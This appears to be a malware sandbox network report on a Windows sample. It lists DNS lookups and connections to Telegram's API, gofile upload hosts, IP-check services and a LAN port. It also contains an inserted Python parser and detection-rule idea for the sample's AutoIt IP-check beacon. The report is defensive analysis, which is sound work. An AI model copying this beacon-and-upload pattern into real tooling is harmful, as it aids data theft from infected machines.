                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.454416037 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.503104925 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:25.944731951 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:25.945327044 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:25.945477962 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:25.945491076 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:25.945527077 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:25.945560932 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:26.330895901 CET4974680192.168.2.4104.16.184.241
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:26.450917959 CET8049746104.16.184.241192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:26.451013088 CET4974680192.168.2.4104.16.184.241
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:26.451260090 CET4974680192.168.2.4104.16.184.241
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:26.571177959 CET8049746104.16.184.241192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:27.589025974 CET8049746104.16.184.241192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:27.589446068 CET4974680192.168.2.4104.16.184.241
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:27.599325895 CET49748443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:27.599365950 CET44349748149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:27.599437952 CET49748443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:27.599766016 CET49748443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:27.599781990 CET44349748149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:27.709825993 CET8049746104.16.184.241192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:27.709894896 CET4974680192.168.2.4104.16.184.241
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:29.020018101 CET44349748149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:29.030040026 CET49748443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:29.030071974 CET44349748149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:29.778763056 CET44349748149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:29.778784037 CET44349748149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:29.778842926 CET44349748149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:29.779129982 CET49748443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:29.780411959 CET49748443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.288302898 CET49751443192.168.2.450.17.0.11
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.288367033 CET4434975150.17.0.11192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.288537979 CET49751443192.168.2.450.17.0.11
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.288945913 CET49751443192.168.2.450.17.0.11
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.288965940 CET4434975150.17.0.11192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.767853975 CET870249730192.168.0.82192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.767908096 CET497308702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.784823895 CET497528702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.904815912 CET870249752192.168.0.82192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.904906034 CET497528702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:30.906322956 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.026252985 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.307580948 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.307648897 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.312499046 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.432405949 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.713689089 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.713754892 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.717897892 CET497528702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.837894917 CET870249752192.168.0.82192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.853667021 CET4434975150.17.0.11192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.853761911 CET49751443192.168.2.450.17.0.11
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.858969927 CET49751443192.168.2.450.17.0.11
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.858999014 CET4434975150.17.0.11192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.859267950 CET4434975150.17.0.11192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.866274118 CET49751443192.168.2.450.17.0.11
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:31.907344103 CET4434975150.17.0.11192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:32.186168909 CET4434975150.17.0.11192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:32.186647892 CET49751443192.168.2.450.17.0.11
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:32.186688900 CET4434975150.17.0.11192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:32.630398035 CET4434975150.17.0.11192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:32.630853891 CET4434975150.17.0.11192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:32.630917072 CET49751443192.168.2.450.17.0.11
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:32.631304979 CET49751443192.168.2.450.17.0.11
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:52.893276930 CET870249752192.168.0.82192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:52.893352985 CET497528702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:52.925317049 CET497548702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.046257973 CET870249754192.168.0.82192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.046427965 CET497548702192.168.2.4192.168.0.82
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.047889948 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.167767048 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.448875904 CET8049731188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:53.448959112 CET4973180192.168.2.4188.138.68.212
Nov 29, 2024 10:57:53.454797983 CET | 49731 | 80 | 192.168.2.4 | 188.138.68.212
Nov 29, 2024 10:57:53.574708939 CET | 80 | 49731 | 188.138.68.212 | 192.168.2.4
Nov 29, 2024 10:57:53.856147051 CET | 80 | 49731 | 188.138.68.212 | 192.168.2.4
Nov 29, 2024 10:57:53.857531071 CET | 49731 | 80 | 192.168.2.4 | 188.138.68.212
Nov 29, 2024 10:57:53.864980936 CET | 49754 | 8702 | 192.168.2.4 | 192.168.0.82
Nov 29, 2024 10:57:53.985016108 CET | 8702 | 49754 | 192.168.0.82 | 192.168.2.4
Nov 29, 2024 10:58:15.019443989 CET | 8702 | 49754 | 192.168.0.82 | 192.168.2.4
Nov 29, 2024 10:58:15.021755934 CET | 49754 | 8702 | 192.168.2.4 | 192.168.0.82
Nov 29, 2024 10:58:15.066207886 CET | 49792 | 8702 | 192.168.2.4 | 192.168.0.82
Nov 29, 2024 10:58:15.186145067 CET | 8702 | 49792 | 192.168.0.82 | 192.168.2.4
Nov 29, 2024 10:58:15.189610958 CET | 49792 | 8702 | 192.168.2.4 | 192.168.0.82
Nov 29, 2024 10:58:15.191031933 CET | 49731 | 80 | 192.168.2.4 | 188.138.68.212
Nov 29, 2024 10:58:15.310926914 CET | 80 | 49731 | 188.138.68.212 | 192.168.2.4
Nov 29, 2024 10:58:15.592215061 CET | 80 | 49731 | 188.138.68.212 | 192.168.2.4
Nov 29, 2024 10:58:15.592308998 CET | 49731 | 80 | 192.168.2.4 | 188.138.68.212
Nov 29, 2024 10:58:15.597872972 CET | 49731 | 80 | 192.168.2.4 | 188.138.68.212
Nov 29, 2024 10:58:15.718127012 CET | 80 | 49731 | 188.138.68.212 | 192.168.2.4
Nov 29, 2024 10:58:15.999650955 CET | 80 | 49731 | 188.138.68.212 | 192.168.2.4
Nov 29, 2024 10:58:15.999747038 CET | 49731 | 80 | 192.168.2.4 | 188.138.68.212
Nov 29, 2024 10:58:16.218462944 CET | 49792 | 8702 | 192.168.2.4 | 192.168.0.82
Nov 29, 2024 10:58:16.338504076 CET | 8702 | 49792 | 192.168.0.82 | 192.168.2.4
Nov 29, 2024 10:58:37.144182920 CET | 8702 | 49792 | 192.168.0.82 | 192.168.2.4
Nov 29, 2024 10:58:37.144270897 CET | 49792 | 8702 | 192.168.2.4 | 192.168.0.82
Nov 29, 2024 10:58:37.175625086 CET | 49843 | 8702 | 192.168.2.4 | 192.168.0.82
Nov 29, 2024 10:58:37.295605898 CET | 8702 | 49843 | 192.168.0.82 | 192.168.2.4
Nov 29, 2024 10:58:37.297719955 CET | 49843 | 8702 | 192.168.2.4 | 192.168.0.82
Nov 29, 2024 10:58:37.298873901 CET | 49731 | 80 | 192.168.2.4 | 188.138.68.212
Nov 29, 2024 10:58:37.418802977 CET | 80 | 49731 | 188.138.68.212 | 192.168.2.4
Nov 29, 2024 10:58:37.702651978 CET | 80 | 49731 | 188.138.68.212 | 192.168.2.4
Nov 29, 2024 10:58:37.702732086 CET | 49731 | 80 | 192.168.2.4 | 188.138.68.212
Nov 29, 2024 10:58:37.708468914 CET | 49731 | 80 | 192.168.2.4 | 188.138.68.212
Nov 29, 2024 10:58:37.828403950 CET | 80 | 49731 | 188.138.68.212 | 192.168.2.4
Nov 29, 2024 10:58:38.114833117 CET | 80 | 49731 | 188.138.68.212 | 192.168.2.4
Nov 29, 2024 10:58:38.114926100 CET | 49731 | 80 | 192.168.2.4 | 188.138.68.212
Nov 29, 2024 10:58:38.119750023 CET | 49843 | 8702 | 192.168.2.4 | 192.168.0.82
Nov 29, 2024 10:58:38.239779949 CET | 8702 | 49843 | 192.168.0.82 | 192.168.2.4
Nov 29, 2024 10:58:59.269714117 CET | 8702 | 49843 | 192.168.0.82 | 192.168.2.4
Nov 29, 2024 10:58:59.269783974 CET | 49843 | 8702 | 192.168.2.4 | 192.168.0.82
Nov 29, 2024 10:58:59.300642014 CET | 49894 | 8702 | 192.168.2.4 | 192.168.0.82
Nov 29, 2024 10:58:59.420612097 CET | 8702 | 49894 | 192.168.0.82 | 192.168.2.4
Nov 29, 2024 10:58:59.420831919 CET | 49894 | 8702 | 192.168.2.4 | 192.168.0.82
Nov 29, 2024 10:58:59.421812057 CET | 49731 | 80 | 192.168.2.4 | 188.138.68.212
Nov 29, 2024 10:58:59.541743040 CET | 80 | 49731 | 188.138.68.212 | 192.168.2.4
Nov 29, 2024 10:58:59.824068069 CET | 80 | 49731 | 188.138.68.212 | 192.168.2.4
Nov 29, 2024 10:58:59.824194908 CET | 49731 | 80 | 192.168.2.4 | 188.138.68.212
Nov 29, 2024 10:58:59.829591990 CET | 49731 | 80 | 192.168.2.4 | 188.138.68.212
Nov 29, 2024 10:58:59.950021982 CET | 80 | 49731 | 188.138.68.212 | 192.168.2.4
Nov 29, 2024 10:59:00.231179953 CET | 80 | 49731 | 188.138.68.212 | 192.168.2.4
Nov 29, 2024 10:59:00.231281042 CET | 49731 | 80 | 192.168.2.4 | 188.138.68.212
Nov 29, 2024 10:59:00.235938072 CET | 49894 | 8702 | 192.168.2.4 | 192.168.0.82
Nov 29, 2024 10:59:00.355882883 CET | 8702 | 49894 | 192.168.0.82 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 29, 2024 10:57:08.928064108 CET | 61749 | 53 | 192.168.2.4 | 1.1.1.1
Nov 29, 2024 10:57:09.925231934 CET | 61749 | 53 | 192.168.2.4 | 1.1.1.1
Nov 29, 2024 10:57:10.281949043 CET | 53 | 61749 | 1.1.1.1 | 192.168.2.4
Nov 29, 2024 10:57:10.281977892 CET | 53 | 61749 | 1.1.1.1 | 192.168.2.4
Nov 29, 2024 10:57:10.468602896 CET | 52186 | 53 | 192.168.2.4 | 1.1.1.1
Nov 29, 2024 10:57:10.646451950 CET | 53 | 52186 | 1.1.1.1 | 192.168.2.4
Nov 29, 2024 10:57:12.828788996 CET | 53451 | 53 | 192.168.2.4 | 1.1.1.1
Nov 29, 2024 10:57:12.969564915 CET | 53 | 53451 | 1.1.1.1 | 192.168.2.4
Nov 29, 2024 10:57:13.129440069 CET | 62803 | 53 | 192.168.2.4 | 1.1.1.1
Nov 29, 2024 10:57:13.271095037 CET | 53 | 62803 | 1.1.1.1 | 192.168.2.4
Nov 29, 2024 10:57:15.858227968 CET | 53596 | 53 | 192.168.2.4 | 1.1.1.1
Nov 29, 2024 10:57:16.111988068 CET | 53 | 53596 | 1.1.1.1 | 192.168.2.4
Nov 29, 2024 10:57:19.564589024 CET | 59425 | 53 | 192.168.2.4 | 1.1.1.1
Nov 29, 2024 10:57:19.704359055 CET | 53 | 59425 | 1.1.1.1 | 192.168.2.4
Nov 29, 2024 10:57:22.091876030 CET | 52237 | 53 | 192.168.2.4 | 1.1.1.1
Nov 29, 2024 10:57:22.326733112 CET | 53 | 52237 | 1.1.1.1 | 192.168.2.4
Nov 29, 2024 10:57:26.173228979 CET | 57400 | 53 | 192.168.2.4 | 1.1.1.1
Nov 29, 2024 10:57:26.314591885 CET | 53 | 57400 | 1.1.1.1 | 192.168.2.4
Nov 29, 2024 10:57:29.793968916 CET | 54727 | 53 | 192.168.2.4 | 1.1.1.1
Nov 29, 2024 10:57:30.286782026 CET | 53 | 54727 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 29, 2024 10:57:08.928064108 CET | 192.168.2.4 | 1.1.1.1 | 0xdc0c | Standard query (0) | ip-score.com | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:09.925231934 CET | 192.168.2.4 | 1.1.1.1 | 0xdc0c | Standard query (0) | ip-score.com | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:10.468602896 CET | 192.168.2.4 | 1.1.1.1 | 0x6484 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:12.828788996 CET | 192.168.2.4 | 1.1.1.1 | 0x765e | Standard query (0) | 56.14.11.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Nov 29, 2024 10:57:13.129440069 CET | 192.168.2.4 | 1.1.1.1 | 0xa3db | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:15.858227968 CET | 192.168.2.4 | 1.1.1.1 | 0x559 | Standard query (0) | icanhazip.com | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:19.564589024 CET | 192.168.2.4 | 1.1.1.1 | 0x467d | Standard query (0) | api.gofile.io | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:22.091876030 CET | 192.168.2.4 | 1.1.1.1 | 0xa8cd | Standard query (0) | store6.gofile.io | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:26.173228979 CET | 192.168.2.4 | 1.1.1.1 | 0x8c93 | Standard query (0) | 56.14.11.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Nov 29, 2024 10:57:29.793968916 CET | 192.168.2.4 | 1.1.1.1 | 0x7c73 | Standard query (0) | szurubooru.zulipchat.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 29, 2024 10:57:10.281949043 CET | 1.1.1.1 | 192.168.2.4 | 0xdc0c | No error (0) | ip-score.com | | 188.138.68.212 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:10.281977892 CET | 1.1.1.1 | 192.168.2.4 | 0xdc0c | No error (0) | ip-score.com | | 188.138.68.212 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:10.646451950 CET | 1.1.1.1 | 192.168.2.4 | 0x6484 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:10.646451950 CET | 1.1.1.1 | 192.168.2.4 | 0x6484 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:10.646451950 CET | 1.1.1.1 | 192.168.2.4 | 0x6484 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:10.646451950 CET | 1.1.1.1 | 192.168.2.4 | 0x6484 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:12.969564915 CET | 1.1.1.1 | 192.168.2.4 | 0x765e | Name error (3) | 56.14.11.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Nov 29, 2024 10:57:13.271095037 CET | 1.1.1.1 | 192.168.2.4 | 0xa3db | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:16.111988068 CET | 1.1.1.1 | 192.168.2.4 | 0x559 | No error (0) | icanhazip.com | | 104.16.184.241 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:16.111988068 CET | 1.1.1.1 | 192.168.2.4 | 0x559 | No error (0) | icanhazip.com | | 104.16.185.241 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:19.704359055 CET | 1.1.1.1 | 192.168.2.4 | 0x467d | No error (0) | api.gofile.io | | 45.112.123.126 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:22.326733112 CET | 1.1.1.1 | 192.168.2.4 | 0xa8cd | No error (0) | store6.gofile.io | | 31.14.70.249 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:26.314591885 CET | 1.1.1.1 | 192.168.2.4 | 0x8c93 | Name error (3) | 56.14.11.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Nov 29, 2024 10:57:30.286782026 CET | 1.1.1.1 | 192.168.2.4 | 0x7c73 | No error (0) | szurubooru.zulipchat.com | | 50.17.0.11 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:30.286782026 CET | 1.1.1.1 | 192.168.2.4 | 0x7c73 | No error (0) | szurubooru.zulipchat.com | | 3.210.246.148 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:30.286782026 CET | 1.1.1.1 | 192.168.2.4 | 0x7c73 | No error (0) | szurubooru.zulipchat.com | | 44.208.10.127 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:30.286782026 CET | 1.1.1.1 | 192.168.2.4 | 0x7c73 | No error (0) | szurubooru.zulipchat.com | | 54.198.104.147 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:30.286782026 CET | 1.1.1.1 | 192.168.2.4 | 0x7c73 | No error (0) | szurubooru.zulipchat.com | | 52.20.41.38 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 10:57:30.286782026 CET | 1.1.1.1 | 192.168.2.4 | 0x7c73 | No error (0) | szurubooru.zulipchat.com | | 3.90.94.202 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                          • raw.githubusercontent.com
                                                                                                                                                                                                                                                          • ip-score.com
                                                                                                                                                                                                                                                          • api.telegram.org
                                                                                                                                                                                                                                                          • api.gofile.io
                                                                                                                                                                                                                                                          • store6.gofile.io
                                                                                                                                                                                                                                                          • szurubooru.zulipchat.com
                                                                                                                                                                                                                                                          • icanhazip.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | 4924 | C:\Users\user\Desktop\LKxcbzlwkz.exe
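The exchanges recorded for this session (eight plain-HTTP GET /checkip/ requests carrying the User-Agent "AutoIt", each answered by a 301 to the HTTPS URL, which the client never follows on this session) are the kind of pattern a detection engineer turns into a rule. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it rebuilds the eight request/response pairs in the report's flattened "Timestamp / Bytes transferred / Direction / Data" layout as a constructed input (timestamps copied from the exchanges listed in this session, bodies reduced to the headers that matter), parses them, and summarises the indicators: the hard-coded AutoIt user agent, the single Host, the 301-to-HTTPS answer, and the retry cadence (a second request within seconds of the first, then a pause of roughly 22 seconds). Function and variable names are my own.

```python
import re
from datetime import datetime

# Request/response timestamps copied from the eight exchanges in this session
# (constructed sample input; the message bodies are reduced to the headers
# that matter for the analysis).
_TIMES = [
    ("10:57:10.428119898", "10:57:11.767261982"),
    ("10:57:13.782089949", "10:57:14.183336973"),
    ("10:57:30.906322956", "10:57:31.307580948"),
    ("10:57:31.312499046", "10:57:31.713689089"),
    ("10:57:53.047889948", "10:57:53.448875904"),
    ("10:57:53.454797983", "10:57:53.856147051"),
    ("10:58:15.191031933", "10:58:15.592215061"),
    ("10:58:15.597872972", "10:58:15.999650955"),
]


def build_capture():
    """Emit the exchanges in the report's flattened 'Timestamp Bytes Direction Data' layout."""
    lines = []
    for req_ts, resp_ts in _TIMES:
        lines += [
            f"Nov 29, 2024 {req_ts} CET66OUTGET /checkip/ HTTP/1.1",
            "User-Agent: AutoIt",
            "Host: ip-score.com",
            f"Nov 29, 2024 {resp_ts} CET373INHTTP/1.1 301 Moved Permanently",
            "Server: nginx/1.19.1",
            "Content-Type: text/html",
            "Content-Length: 169",
            "Connection: keep-alive",
            "Location: https://ip-score.com/checkip/",
        ]
    return "\n".join(lines)


# Timestamp, byte count, direction and first line are run together in the export;
# the digits right after the timezone are the byte count, followed by OUT or IN.
_MSG = re.compile(
    r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+) CET"
    r"(?P<bytes>\d+)(?P<dir>OUT|IN)(?P<first>.*)$"
)


def parse_messages(text):
    """Split the flattened capture into messages: first line plus a header dict."""
    msgs = []
    for line in text.splitlines():
        m = _MSG.match(line)
        if m:
            # Nine fractional digits in the export; strptime accepts at most six.
            ts = datetime.strptime(m["ts"][:-3], "%b %d, %Y %H:%M:%S.%f")
            msgs.append({"ts": ts, "bytes": int(m["bytes"]), "dir": m["dir"],
                         "first": m["first"], "headers": {}})
        elif msgs and ":" in line and not line.startswith("Data "):
            # Header line belonging to the most recent message ("Data Raw"/"Data Ascii" are skipped).
            name, value = line.split(":", 1)
            msgs[-1]["headers"][name.strip().lower()] = value.strip()
    return msgs


def analyze(msgs):
    """Summarise the beacon: who it talks to, how the server answers, and the cadence."""
    reqs = [m for m in msgs if m["dir"] == "OUT"]
    resps = [m for m in msgs if m["dir"] == "IN"]
    gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(reqs, reqs[1:])]
    agents = sorted({r["headers"].get("user-agent", "") for r in reqs})
    hosts = sorted({r["headers"].get("host", "") for r in reqs})
    return {
        "requests": len(reqs),
        "user_agents": agents,
        "hosts": hosts,
        "statuses": sorted({r["first"].split()[1] for r in resps}),
        # Every answer points at the https:// URL; the client keeps using port 80.
        "redirect_to_https": all(r["headers"].get("location", "").startswith("https://")
                                 for r in resps),
        # A follow-up request within a few seconds of the previous one is a retry;
        # the longer pauses are the sleep between attempts.
        "retries_within_5s": sum(1 for g in gaps if g < 5.0),
        "max_gap_s": round(max(gaps), 1) if gaps else 0.0,
        # The indicator pair worth a network rule: AutoIt UA against the IP-check host.
        "autoit_ipcheck_beacon": bool(reqs) and agents == ["AutoIt"] and "ip-score.com" in hosts,
    }


if __name__ == "__main__":
    for key, value in analyze(parse_messages(build_capture())).items():
        print(f"{key}: {value}")
```

The two predicates behind `autoit_ipcheck_beacon` are what a network rule would key on (for Suricata, `http.user_agent` matching "AutoIt" together with `http.host` matching "ip-score.com"); a rule of that shape is an assumption about the monitoring stack, not something the report contains. The sandbox only recorded plain HTTP on port 80 for this session, so the 301 to HTTPS was never followed here; on a live network the same loop would look like a client re-requesting the redirected URL in pairs every 22 seconds or so.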
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 10:57:10.428119898 CET | 66 | OUT | GET /checkip/ HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                          Host: ip-score.com
Nov 29, 2024 10:57:11.767261982 CET | 373 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                          Server: nginx/1.19.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:14 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                          Content-Length: 169
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Location: https://ip-score.com/checkip/
                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
Nov 29, 2024 10:57:13.782089949 CET | 66 | OUT | GET /checkip/ HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                          Host: ip-score.com
Nov 29, 2024 10:57:14.183336973 CET | 373 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                          Server: nginx/1.19.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:17 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                          Content-Length: 169
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Location: https://ip-score.com/checkip/
                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
Nov 29, 2024 10:57:30.906322956 CET | 66 | OUT | GET /checkip/ HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                          Host: ip-score.com
Nov 29, 2024 10:57:31.307580948 CET | 373 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                          Server: nginx/1.19.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:34 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                          Content-Length: 169
